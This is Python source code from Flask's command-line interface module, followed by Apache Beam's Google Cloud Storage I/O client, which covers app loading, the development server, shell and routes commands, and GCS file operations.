if self._app is not None:
return self._app(environ, start_response)
self._flush_bg_loading_exception()
with self._lock:
if self._app is not None:
rv = self._app
else:
rv = self._load_unlocked()
return rv(environ, start_response)
class ScriptInfo:
"""Helper object to deal with Flask applications. This is usually not
necessary to interface with as it's used internally in the dispatching
to click. In future versions of Flask this object will most likely play
a bigger role. Typically it's created automatically by the
:class:`FlaskGroup` but you can also manually create it and pass it
onwards as click object.
"""
def __init__(self, app_import_path=None, create_app=None, set_debug_flag=True):
#: Optionally the import path for the Flask application.
self.app_import_path = app_import_path or os.environ.get("FLASK_APP")
#: Optionally a function that is passed the script info to create
#: the instance of the application.
self.create_app = create_app
#: A dictionary with arbitrary data that can be associated with
#: this script info.
self.data = {}
self.set_debug_flag = set_debug_flag
self._loaded_app = None
def load_app(self):
"""Loads the Flask app (if not yet loaded) and returns it. Calling
this multiple times will just result in the already loaded app to
be returned.
"""
__traceback_hide__ = True # noqa: F841
if self._loaded_app is not None:
return self._loaded_app
if self.create_app is not None:
app = self.create_app()
else:
if self.app_import_path:
path, name = (
re.split(r":(?![\\/])", self.app_import_path, 1) + [None]
)[:2]
import_name = prepare_import(path)
app = locate_app(import_name, name)
else:
for path in ("wsgi.py", "app.py"):
import_name = prepare_import(path)
app = locate_app(import_name, None, raise_if_not_found=False)
if app:
break
if not app:
raise NoAppException(
"Could not locate a Flask application. You did not provide "
'the "FLASK_APP" environment variable, and a "wsgi.py" or '
'"app.py" module was not found in the current directory.'
)
if self.set_debug_flag:
# Update the app's debug flag through the descriptor so that
# other values repopulate as well.
app.debug = get_debug_flag()
self._loaded_app = app
return app
pass_script_info = click.make_pass_decorator(ScriptInfo, ensure=True)
def with_appcontext(f):
"""Wraps a callback so that it's guaranteed to be executed with the
script's application context. If callbacks are registered directly
to the ``app.cli`` object then they are wrapped with this function
by default unless it's disabled.
"""
@click.pass_context
def decorator(__ctx, *args, **kwargs):
with __ctx.ensure_object(ScriptInfo).load_app().app_context():
return __ctx.invoke(f, *args, **kwargs)
return update_wrapper(decorator, f)
class AppGroup(click.Group):
"""This works similar to a regular click :class:`~click.Group` but it
changes the behavior of the :meth:`command` decorator so that it
automatically wraps the functions in :func:`with_appcontext`.
Not to be confused with :class:`FlaskGroup`.
"""
def command(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it wraps callbacks in :func:`with_appcontext`
unless it's disabled by passing ``with_appcontext=False``.
"""
wrap_for_ctx = kwargs.pop("with_appcontext", True)
def decorator(f):
if wrap_for_ctx:
f = with_appcontext(f)
return click.Group.command(self, *args, **kwargs)(f)
return decorator
def group(self, *args, **kwargs):
"""This works exactly like the method of the same name on a regular
:class:`click.Group` but it defaults the group class to
:class:`AppGroup`.
"""
kwargs.setdefault("cls", AppGroup)
return click.Group.group(self, *args, **kwargs)
class FlaskGroup(AppGroup):
"""Special subclass of the :class:`AppGroup` group that supports
loading more commands from the configured Flask app. Normally a
developer does not have to interface with this class but there are
some very advanced use cases for which it makes sense to create an
instance of this. see :ref:`custom-scripts`.
:param add_default_commands: if this is True then the default run and
shell commands will be added.
:param add_version_option: adds the ``--version`` option.
:param create_app: an optional callback that is passed the script info and
returns the loaded app.
:param load_dotenv: Load the nearest :file:`.env` and :file:`.flaskenv`
files to set environment variables. Will also change the working
directory to the directory containing the first file found.
:param set_debug_flag: Set the app's debug flag based on the active
environment
.. versionchanged:: 1.0
If installed, python-dotenv will be used to load environment variables
from :file:`.env` and :file:`.flaskenv` files.
"""
def __init__(
self,
add_default_commands=True,
create_app=None,
add_version_option=True,
load_dotenv=True,
set_debug_flag=True,
**extra,
):
params = list(extra.pop("params", None) or ())
if add_version_option:
params.append(version_option)
AppGroup.__init__(self, params=params, **extra)
self.create_app = create_app
self.load_dotenv = load_dotenv
self.set_debug_flag = set_debug_flag
if add_default_commands:
self.add_command(run_command)
self.add_command(shell_command)
self.add_command(routes_command)
self._loaded_plugin_commands = False
def _load_plugin_commands(self):
if self._loaded_plugin_commands:
return
try:
import pkg_resources
except ImportError:
self._loaded_plugin_commands = True
return
for ep in pkg_resources.iter_entry_points("flask.commands"):
self.add_command(ep.load(), ep.name)
self._loaded_plugin_commands = True
def get_command(self, ctx, name):
self._load_plugin_commands()
# Look up built-in and plugin commands, which should be
# available even if the app fails to load.
rv = super().get_command(ctx, name)
if rv is not None:
return rv
info = ctx.ensure_object(ScriptInfo)
# Look up commands provided by the app, showing an error and
# continuing if the app couldn't be loaded.
try:
return info.load_app().cli.get_command(ctx, name)
except NoAppException as e:
click.secho(f"Error: {e.format_message()}\n", err=True, fg="red")
def list_commands(self, ctx):
self._load_plugin_commands()
# Start with the built-in and plugin commands.
rv = set(super().list_commands(ctx))
info = ctx.ensure_object(ScriptInfo)
# Add commands provided by the app, showing an error and
# continuing if the app couldn't be loaded.
try:
rv.update(info.load_app().cli.list_commands(ctx))
except NoAppException as e:
# When an app couldn't be loaded, show the error message
# without the traceback.
click.secho(f"Error: {e.format_message()}\n", err=True, fg="red")
except Exception:
# When any other errors occurred during loading, show the
# full traceback.
click.secho(f"{traceback.format_exc()}\n", err=True, fg="red")
return sorted(rv)
def main(self, *args, **kwargs):
# Set a global flag that indicates that we were invoked from the
# command line interface. This is detected by Flask.run to make the
# call into a no-op. This is necessary to avoid ugly errors when the
# script that is loaded here also attempts to start a server.
os.environ["FLASK_RUN_FROM_CLI"] = "true"
if get_load_dotenv(self.load_dotenv):
load_dotenv()
obj = kwargs.get("obj")
if obj is None:
obj = ScriptInfo(
create_app=self.create_app, set_debug_flag=self.set_debug_flag
)
kwargs["obj"] = obj
kwargs.setdefault("auto_envvar_prefix", "FLASK")
return super().main(*args, **kwargs)
def _path_is_ancestor(path, other):
"""Take ``other`` and remove the length of ``path`` from it. Then join it
to ``path``. If it is the original value, ``path`` is an ancestor of
``other``."""
return os.path.join(path, other[len(path) :].lstrip(os.sep)) == other
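# Editor's note (illustrative): _path_is_ancestor('/home/user', '/home/user/project')
# is True, whereas _path_is_ancestor('/home/user', '/home/user2') is False because
# re-joining the stripped remainder yields '/home/user/2' rather than the original.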
def load_dotenv(path=None):
"""Load "dotenv" files in order of precedence to set environment variables.
If an env var is already set it is not overwritten, so earlier files in the
list are preferred over later files.
This is a no-op if `python-dotenv`_ is not installed.
.. _python-dotenv: https://github.com/theskumar/python-dotenv#readme
:param path: Load the file at this location instead of searching.
:return: ``True`` if a file was loaded.
.. versionchanged:: 1.1.0
Returns ``False`` when python-dotenv is not installed, or when
the given path isn't a file.
.. versionchanged:: 2.0
When loading the env files, set the default encoding to UTF-8.
.. versionadded:: 1.0
"""
if dotenv is None:
if path or os.path.isfile(".env") or os.path.isfile(".flaskenv"):
click.secho(
" * Tip: There are .env or .flaskenv files present."
' Do "pip install python-dotenv" to use them.',
fg="yellow",
err=True,
)
return False
# if the given path specifies the actual file then return True,
# else False
if path is not None:
if os.path.isfile(path):
return dotenv.load_dotenv(path, encoding="utf-8")
return False
new_dir = None
for name in (".env", ".flaskenv"):
path = dotenv.find_dotenv(name, usecwd=True)
if not path:
continue
if new_dir is None:
new_dir = os.path.dirname(path)
dotenv.load_dotenv(path, encoding="utf-8")
return new_dir is not None # at least one file was located and loaded
def show_server_banner(env, debug, app_import_path, eager_loading):
"""Show extra startup messages the first time the server is run,
ignoring the reloader.
"""
if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
return
if app_import_path is not None:
message = f" * Serving Flask app {app_import_path!r}"
if not eager_loading:
message += " (lazy loading)"
click.echo(message)
click.echo(f" * Environment: {env}")
if env == "production":
click.secho(
" WARNING: This is a development server. Do not use it in"
" a production deployment.",
fg="red",
)
click.secho(" Use a production WSGI server instead.", dim=True)
if debug is not None:
click.echo(f" * Debug mode: {'on' if debug else 'off'}")
class CertParamType(click.ParamType):
"""Click option type for the ``--cert`` option. Allows either an
existing file, the string ``'adhoc'``, or an import for a
:class:`~ssl.SSLContext` object.
"""
name = "path"
def __init__(self):
self.path_type = click.Path(exists=True, dir_okay=False, resolve_path=True)
def convert(self, value, param, ctx):
if ssl is None:
raise click.BadParameter(
'Using "--cert" requires Python to be compiled with SSL support.',
ctx,
param,
)
try:
return self.path_type(value, param, ctx)
except click.BadParameter:
value = click.STRING(value, param, ctx).lower()
if value == "adhoc":
try:
import cryptography # noqa: F401
except ImportError:
raise click.BadParameter(
"Using ad-hoc certificates requires the cryptography library.",
ctx,
param,
) from None
return value
obj = import_string(value, silent=True)
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx, param, value):
"""The ``--key`` option must be specified when ``--cert`` is a file.
Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
"""
cert = ctx.params.get("cert")
is_adhoc = cert == "adhoc"
is_context = ssl and isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.', ctx, param
)
if is_context:
raise click.BadParameter(
'When "--cert" is an SSLContext object, "--key is not used.', ctx, param
)
if not cert:
raise click.BadParameter('"--cert" must also be specified.', ctx, param)
ctx.params["cert"] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter('Required when using "--cert".', ctx, param)
return value
class SeparatedPathType(click.Path):
"""Click option type that accepts a list of values separated by the
OS's path separator (``:``, ``;`` on Windows). Each value is
validated as a :class:`click.Path` type.
"""
def convert(self, value, param, ctx):
items = self.split_envvar_value(value)
super_convert = super().convert
return [super_convert(item, param, ctx) for item in items]
@click.command("run", short_help="Run a development server.")
@click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.")
@click.option("--port", "-p", default=5000, help="The port to bind to.")
@click.option(
"--cert", type=CertParamType(), help="Specify a certificate file to use HTTPS."
)
@click.option(
"--key",
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key,
expose_value=False,
help="The key file to use when specifying a certificate.",
)
@click.option(
"--reload/--no-reload",
default=None,
help="Enable or disable the reloader. By default the reloader "
"is active if debug is enabled.",
)
@click.option(
"--debugger/--no-debugger",
default=None,
help="Enable or disable the debugger. By default the debugger "
"is active if debug is enabled.",
)
@click.option(
"--eager-loading/--lazy-loading",
default=None,
help="Enable or disable eager loading. By default eager "
"loading is enabled if the reloader is disabled.",
)
@click.option(
"--with-threads/--without-threads",
default=True,
help="Enable or disable multithreading.",
)
@click.option(
"--extra-files",
default=None,
type=SeparatedPathType(),
help=(
"Extra files that trigger a reload on change. Multiple paths"
f" are separated by {os.path.pathsep!r}."
),
)
@pass_script_info
def run_command(
info, host, port, reload, debugger, eager_loading, with_threads, cert, extra_files
):
"""Run a local development server.
This server is for development purposes only. It does not provide
the stability, security, or performance of production WSGI servers.
The reloader and debugger are enabled by default if
FLASK_ENV=development or FLASK_DEBUG=1.
"""
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
from werkzeug.serving import run_simple
run_simple(
host,
port,
app,
use_reloader=reload,
use_debugger=debugger,
threaded=with_threads,
ssl_context=cert,
extra_files=extra_files,
)
@click.command("shell", short_help="Run a shell in the app context.")
@with_appcontext
def shell_command() -> None:
"""Run an interactive Python shell in the context of a given
Flask application. The application will populate the default
namespace of this shell according to its configuration.
This is useful for executing small snippets of management code
without having to manually configure the application.
"""
import code
from .globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = (
f"Python {sys.version} on {sys.platform}\n"
f"App: {app.import_name} [{app.env}]\n"
f"Instance: {app.instance_path}"
)
ctx: dict = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get("PYTHONSTARTUP")
if startup and os.path.isfile(startup):
with open(startup) as f:
eval(compile(f.read(), startup, "exec"), ctx)
ctx.update(app.make_shell_context())
# Site, customize, or startup script can set a hook to call when
# entering interactive mode. The default one sets up readline with
# tab and history completion.
interactive_hook = getattr(sys, "__interactivehook__", None)
if interactive_hook is not None:
try:
import readline
from rlcompleter import Completer
except ImportError:
pass
else:
# rlcompleter uses __main__.__dict__ by default, which is
# flask.__main__. Use the shell context instead.
readline.set_completer(Completer(ctx).complete)
interactive_hook()
code.interact(banner=banner, local=ctx)
@click.command("routes", short_help="Show the routes for the app.")
@click.option(
"--sort",
"-s",
type=click.Choice(("endpoint", "methods", "rule", "match")),
default="endpoint",
help=(
'Method to sort routes by. "match" is the order that Flask will match '
"routes when dispatching a request."
),
)
@click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.")
@with_appcontext
def routes_command(sort: str, all_methods: bool) -> None:
"""Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo("No routes were registered.")
return
ignored_methods = set(() if all_methods else ("HEAD", "OPTIONS"))
if sort in ("endpoint", "rule"):
rules = sorted(rules, key=attrgetter(sort))
elif sort == "methods":
rules = sorted(rules, key=lambda rule: sorted(rule.methods)) # type: ignore
rule_methods = [
", ".join(sorted(rule.methods - ignored_methods)) # type: ignore
for rule in rules
]
headers = ("Endpoint", "Methods", "Rule")
widths = (
max(len(rule.endpoint) for rule in rules),
max(len(methods) for methods in rule_methods),
max(len(rule.rule) for rule in rules),
)
widths = [max(len(h), w) for h, w in zip(headers, widths)]
row = "{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}".format(*widths)
click.echo(row.format(*headers).strip())
click.echo(row.format(*("-" * width for width in widths)))
for rule, methods in zip(rules, rule_methods):
click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
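# Illustrative sketch (not part of the original module): the column-width and
# row-format idiom used by routes_command above, shown with made-up data so it
# can run without an application context.
def _aligned_table_sketch():
    headers = ("Endpoint", "Methods", "Rule")
    rows = [("index", "GET", "/"), ("static", "GET", "/static/<path:filename>")]
    widths = [max(len(h), max(len(r[i]) for r in rows)) for i, h in enumerate(headers)]
    # Build a single format string such as "{0:<8}  {1:<7}  {2:<24}".
    fmt = "{{0:<{0}}}  {{1:<{1}}}  {{2:<{2}}}".format(*widths)
    click.echo(fmt.format(*headers))
    click.echo(fmt.format(*("-" * w for w in widths)))
    for r in rows:
        click.echo(fmt.format(*r).rstrip())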
cli = FlaskGroup(
help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd="export" if os.name == "posix" else "set",
prefix="$ " if os.name == "posix" else "> ",
)
)
def main() -> None:
cli.main()
if __name__ == "__main__":
main()
|
gcsio.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Google Cloud Storage client.
This library evolved from the Google App Engine GCS client available at
https://github.com/GoogleCloudPlatform/appengine-gcs-client.
"""
from __future__ import absolute_import
import errno
import io
import logging
import multiprocessing
import re
import sys
import threading
import time
import traceback
from builtins import object
from apache_beam.internal.http_client import get_new_http
from apache_beam.io.filesystemio import Downloader
from apache_beam.io.filesystemio import DownloaderStream
from apache_beam.io.filesystemio import PipeStream
from apache_beam.io.filesystemio import Uploader
from apache_beam.io.filesystemio import UploaderStream
from apache_beam.utils import retry
__all__ = ['GcsIO']
# Issue a friendlier error message if the storage library is not available.
# TODO(silviuc): Remove this guard when storage is available everywhere.
try:
# pylint: disable=wrong-import-order, wrong-import-position
# pylint: disable=ungrouped-imports
import apitools.base.py.transfer as transfer
from apitools.base.py.batch import BatchApiRequest
from apitools.base.py.exceptions import HttpError
from apache_beam.internal.gcp import auth
from apache_beam.io.gcp.internal.clients import storage
except ImportError:
raise ImportError(
'Google Cloud Storage I/O not supported for this execution environment '
'(could not import storage API client).')
# This is the size of each partial-file read operation from GCS. This
# parameter was chosen to give good throughput while keeping memory usage at
# a reasonable level; the following table shows throughput reached when
# reading files of a given size with a chosen buffer size and informed the
# choice of the value, as of 11/2016:
#
# +---------------+------------+-------------+-------------+-------------+
# | | 50 MB file | 100 MB file | 200 MB file | 400 MB file |
# +---------------+------------+-------------+-------------+-------------+
# | 8 MB buffer | 17.12 MB/s | 22.67 MB/s | 23.81 MB/s | 26.05 MB/s |
# | 16 MB buffer | 24.21 MB/s | 42.70 MB/s | 42.89 MB/s | 46.92 MB/s |
# | 32 MB buffer | 28.53 MB/s | 48.08 MB/s | 54.30 MB/s | 54.65 MB/s |
# | 400 MB buffer | 34.72 MB/s | 71.13 MB/s | 79.13 MB/s | 85.39 MB/s |
# +---------------+------------+-------------+-------------+-------------+
DEFAULT_READ_BUFFER_SIZE = 16 * 1024 * 1024
# This is the number of seconds the library will wait for a partial-file read
# operation from GCS to complete before retrying.
DEFAULT_READ_SEGMENT_TIMEOUT_SECONDS = 60
# This is the size of chunks used when writing to GCS.
WRITE_CHUNK_SIZE = 8 * 1024 * 1024
# Maximum number of operations permitted in GcsIO.copy_batch() and
# GcsIO.delete_batch().
MAX_BATCH_OPERATION_SIZE = 100
# Batch endpoint URL for GCS.
# We have to specify an API specific endpoint here since Google APIs global
# batch endpoints will be deprecated on 03/25/2019.
# See https://developers.googleblog.com/2018/03/discontinuing-support-for-json-rpc-and.html. # pylint: disable=line-too-long
# Currently apitools library uses a global batch endpoint by default:
# https://github.com/google/apitools/blob/master/apitools/base/py/batch.py#L152
# TODO: remove this constant and its usage after apitools moves to using an API
# specific batch endpoint or after the Beam gcsio module starts using a GCS client
# library that does not use global batch endpoints.
GCS_BATCH_ENDPOINT = 'https://www.googleapis.com/batch/storage/v1'
def parse_gcs_path(gcs_path, object_optional=False):
"""Return the bucket and object names of the given gs:// path."""
match = re.match('^gs://([^/]+)/(.*)$', gcs_path)
if match is None or (match.group(2) == '' and not object_optional):
raise ValueError('GCS path must be in the form gs://<bucket>/<object>.')
return match.group(1), match.group(2)
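# Illustrative sketch (not part of the original module): how parse_gcs_path splits
# a gs:// URL. Wrapped in a function so importing this file stays side-effect free;
# the paths below are made-up examples.
def _parse_gcs_path_sketch():
    bucket, name = parse_gcs_path('gs://my-bucket/some/object.txt')
    assert (bucket, name) == ('my-bucket', 'some/object.txt')
    # With object_optional=True a bucket-only path is also accepted.
    bucket, name = parse_gcs_path('gs://my-bucket/', object_optional=True)
    assert (bucket, name) == ('my-bucket', '')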
class GcsIOError(IOError, retry.PermanentException):
"""GCS IO error that should not be retried."""
pass
class GcsIO(object):
"""Google Cloud Storage I/O client."""
def __new__(cls, storage_client=None):
if storage_client:
# This path is only used for testing.
return super(GcsIO, cls).__new__(cls)
else:
# Create a single storage client for each thread. We would like to avoid
# creating more than one storage client for each thread, since each
# initialization requires the relatively expensive step of initializing
# credentials.
local_state = threading.local()
if getattr(local_state, 'gcsio_instance', None) is None:
credentials = auth.get_service_credentials()
storage_client = storage.StorageV1(
credentials=credentials,
get_credentials=False,
http=get_new_http(),
response_encoding=None if sys.version_info[0] < 3 else 'utf8')
local_state.gcsio_instance = super(GcsIO, cls).__new__(cls)
local_state.gcsio_instance.client = storage_client
return local_state.gcsio_instance
def __init__(self, storage_client=None):
# We must do this check on storage_client because the client attribute may
# have already been set in __new__ for the singleton case when
# storage_client is None.
if storage_client is not None:
self.client = storage_client
self._rewrite_cb = None
def _set_rewrite_response_callback(self, callback):
"""For testing purposes only. No backward compatibility guarantees.
Args:
callback: A function that receives ``storage.RewriteResponse``.
"""
self._rewrite_cb = callback
def open(self,
filename,
mode='r',
read_buffer_size=DEFAULT_READ_BUFFER_SIZE,
mime_type='application/octet-stream'):
"""Open a GCS file path for reading or writing.
Args:
filename (str): GCS file path in the form ``gs://<bucket>/<object>``.
mode (str): ``'r'`` for reading or ``'w'`` for writing.
read_buffer_size (int): Buffer size to use during read operations.
mime_type (str): Mime type to set for write operations.
Returns:
GCS file object.
Raises:
~exceptions.ValueError: Invalid open file mode.
"""
if mode == 'r' or mode == 'rb':
downloader = GcsDownloader(self.client, filename,
buffer_size=read_buffer_size)
return io.BufferedReader(DownloaderStream(downloader, read_buffer_size=read_buffer_size, mode=mode),
buffer_size=read_buffer_size)
elif mode == 'w' or mode == 'wb':
uploader = GcsUploader(self.client, filename, mime_type)
return io.BufferedWriter(UploaderStream(uploader, mode=mode),
buffer_size=128 * 1024)
else:
raise ValueError('Invalid file open mode: %s.' % mode)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def delete(self, path):
"""Deletes the object at the given GCS path.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsDeleteRequest(
bucket=bucket, object=object_path)
try:
self.client.objects.Delete(request)
except HttpError as http_error:
if http_error.status_code == 404:
# Return success when the file doesn't exist anymore for idempotency.
return
raise
# We intentionally do not decorate this method with a retry, as retrying is
# handled in BatchApiRequest.Execute().
def delete_batch(self, paths):
"""Deletes the objects at the given GCS paths.
Args:
paths: List of GCS file path patterns in the form gs://<bucket>/<name>,
not to exceed MAX_BATCH_OPERATION_SIZE in length.
Returns: List of tuples of (path, exception) in the same order as the paths
argument, where exception is None if the operation succeeded or
the relevant exception if the operation failed.
"""
if not paths:
return []
batch_request = BatchApiRequest(
batch_url=GCS_BATCH_ENDPOINT,
retryable_codes=retry.SERVER_ERROR_OR_TIMEOUT_CODES,
response_encoding='utf-8')
for path in paths:
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsDeleteRequest(
bucket=bucket, object=object_path)
batch_request.Add(self.client.objects, 'Delete', request)
api_calls = batch_request.Execute(self.client._http) # pylint: disable=protected-access
result_statuses = []
for i, api_call in enumerate(api_calls):
path = paths[i]
exception = None
if api_call.is_error:
exception = api_call.exception
# Return success when the file doesn't exist anymore for idempotency.
if isinstance(exception, HttpError) and exception.status_code == 404:
exception = None
result_statuses.append((path, exception))
return result_statuses
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def copy(self, src, dest, dest_kms_key_name=None,
max_bytes_rewritten_per_call=None):
"""Copies the given GCS object from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>.
dest: GCS file path pattern in the form gs://<bucket>/<name>.
dest_kms_key_name: Experimental. No backwards compatibility guarantees.
Encrypt dest with this Cloud KMS key. If None, will use dest bucket
encryption defaults.
max_bytes_rewritten_per_call: Experimental. No backwards compatibility
guarantees. Each rewrite API call will return after these many bytes.
Used for testing.
Raises:
TimeoutError on timeout.
"""
src_bucket, src_path = parse_gcs_path(src)
dest_bucket, dest_path = parse_gcs_path(dest)
request = storage.StorageObjectsRewriteRequest(
sourceBucket=src_bucket,
sourceObject=src_path,
destinationBucket=dest_bucket,
destinationObject=dest_path,
destinationKmsKeyName=dest_kms_key_name,
maxBytesRewrittenPerCall=max_bytes_rewritten_per_call)
response = self.client.objects.Rewrite(request)
while not response.done:
logging.debug(
'Rewrite progress: %d of %d bytes, %s to %s',
response.totalBytesRewritten, response.objectSize, src, dest)
request.rewriteToken = response.rewriteToken
response = self.client.objects.Rewrite(request)
if self._rewrite_cb is not None:
self._rewrite_cb(response)
logging.debug('Rewrite done: %s to %s', src, dest)
# We intentionally do not decorate this method with a retry, as retrying is
# handled in BatchApiRequest.Execute().
def copy_batch(self, src_dest_pairs, dest_kms_key_name=None,
max_bytes_rewritten_per_call=None):
"""Copies the given GCS object from src to dest.
Args:
src_dest_pairs: list of (src, dest) tuples of gs://<bucket>/<name> files
paths to copy from src to dest, not to exceed
MAX_BATCH_OPERATION_SIZE in length.
dest_kms_key_name: Experimental. No backwards compatibility guarantees.
Encrypt dest with this Cloud KMS key. If None, will use dest bucket
encryption defaults.
max_bytes_rewritten_per_call: Experimental. No backwards compatibility
guarantees. Each rewrite call will return after these many bytes. Used
primarily for testing.
Returns: List of tuples of (src, dest, exception) in the same order as the
src_dest_pairs argument, where exception is None if the operation
succeeded or the relevant exception if the operation failed.
"""
if not src_dest_pairs:
return []
pair_to_request = {}
for pair in src_dest_pairs:
src_bucket, src_path = parse_gcs_path(pair[0])
dest_bucket, dest_path = parse_gcs_path(pair[1])
request = storage.StorageObjectsRewriteRequest(
sourceBucket=src_bucket,
sourceObject=src_path,
destinationBucket=dest_bucket,
destinationObject=dest_path,
destinationKmsKeyName=dest_kms_key_name,
maxBytesRewrittenPerCall=max_bytes_rewritten_per_call)
pair_to_request[pair] = request
pair_to_status = {}
while True:
pairs_in_batch = list(set(src_dest_pairs) - set(pair_to_status))
if not pairs_in_batch:
break
batch_request = BatchApiRequest(
batch_url=GCS_BATCH_ENDPOINT,
retryable_codes=retry.SERVER_ERROR_OR_TIMEOUT_CODES,
response_encoding='utf-8')
for pair in pairs_in_batch:
batch_request.Add(self.client.objects, 'Rewrite', pair_to_request[pair])
api_calls = batch_request.Execute(self.client._http) # pylint: disable=protected-access
for pair, api_call in zip(pairs_in_batch, api_calls):
src, dest = pair
response = api_call.response
if self._rewrite_cb is not None:
self._rewrite_cb(response)
if api_call.is_error:
exception = api_call.exception
# Translate 404 to the appropriate not found exception.
if isinstance(exception, HttpError) and exception.status_code == 404:
exception = (
GcsIOError(errno.ENOENT, 'Source file not found: %s' % src))
pair_to_status[pair] = exception
elif not response.done:
logging.debug(
'Rewrite progress: %d of %d bytes, %s to %s',
response.totalBytesRewritten, response.objectSize, src, dest)
pair_to_request[pair].rewriteToken = response.rewriteToken
else:
logging.debug('Rewrite done: %s to %s', src, dest)
pair_to_status[pair] = None
return [(pair[0], pair[1], pair_to_status[pair]) for pair in src_dest_pairs]
# We intentionally do not decorate this method with a retry, since the
# underlying copy and delete operations are already idempotent operations
# protected by retry decorators.
def copytree(self, src, dest):
"""Renames the given GCS "directory" recursively from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>/.
dest: GCS file path pattern in the form gs://<bucket>/<name>/.
"""
assert src.endswith('/')
assert dest.endswith('/')
for entry in self.list_prefix(src):
rel_path = entry[len(src):]
self.copy(entry, dest + rel_path)
# We intentionally do not decorate this method with a retry, since the
# underlying copy and delete operations are already idempotent operations
# protected by retry decorators.
def rename(self, src, dest):
"""Renames the given GCS object from src to dest.
Args:
src: GCS file path pattern in the form gs://<bucket>/<name>.
dest: GCS file path pattern in the form gs://<bucket>/<name>.
"""
self.copy(src, dest)
self.delete(src)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def exists(self, path):
"""Returns whether the given GCS object exists.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
try:
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
self.client.objects.Get(request) # metadata
return True
except HttpError as http_error:
if http_error.status_code == 404:
# HTTP 404 indicates that the file did not exist
return False
else:
# We re-raise all other exceptions
raise
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def checksum(self, path):
"""Looks up the checksum of a GCS object.
Args:
path: GCS file path pattern in the form gs://<bucket>/<name>.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
return self.client.objects.Get(request).crc32c
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def size(self, path):
"""Returns the size of a single GCS object.
This method does not perform glob expansion. Hence the given path must be
for a single GCS object.
Returns: size of the GCS object in bytes.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
return self.client.objects.Get(request).size
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def kms_key(self, path):
"""Returns the KMS key of a single GCS object.
This method does not perform glob expansion. Hence the given path must be
for a single GCS object.
Returns: KMS key name of the GCS object as a string, or None if it doesn't
have one.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
return self.client.objects.Get(request).kmsKeyName
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def last_updated(self, path):
"""Returns the last updated epoch time of a single GCS object.
This method does not perform glob expansion. Hence the given path must be
for a single GCS object.
Returns: last updated time of the GCS object in seconds.
"""
bucket, object_path = parse_gcs_path(path)
request = storage.StorageObjectsGetRequest(
bucket=bucket, object=object_path)
datetime = self.client.objects.Get(request).updated
return (time.mktime(datetime.timetuple()) - time.timezone
+ datetime.microsecond / 1000000.0)
@retry.with_exponential_backoff(
retry_filter=retry.retry_on_server_errors_and_timeout_filter)
def list_prefix(self, path):
"""Lists files matching the prefix.
Args:
path: GCS file path pattern in the form gs://<bucket>/[name].
Returns:
Dictionary of file name -> size.
"""
bucket, prefix = parse_gcs_path(path, object_optional=True)
request = storage.StorageObjectsListRequest(bucket=bucket, prefix=prefix)
file_sizes = {}
counter = 0
start_time = time.time()
logging.info("Starting the size estimation of the input")
while True:
response = self.client.objects.List(request)
for item in response.items:
file_name = 'gs://%s/%s' % (item.bucket, item.name)
file_sizes[file_name] = item.size
counter += 1
if counter % 10000 == 0:
logging.info("Finished computing size of: %s files", len(file_sizes))
if response.nextPageToken:
request.pageToken = response.nextPageToken
else:
break
logging.info("Finished listing %s files in %s seconds.",
counter, time.time() - start_time)
return file_sizes
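# Illustrative sketch (not part of the original module): typical GcsIO usage.
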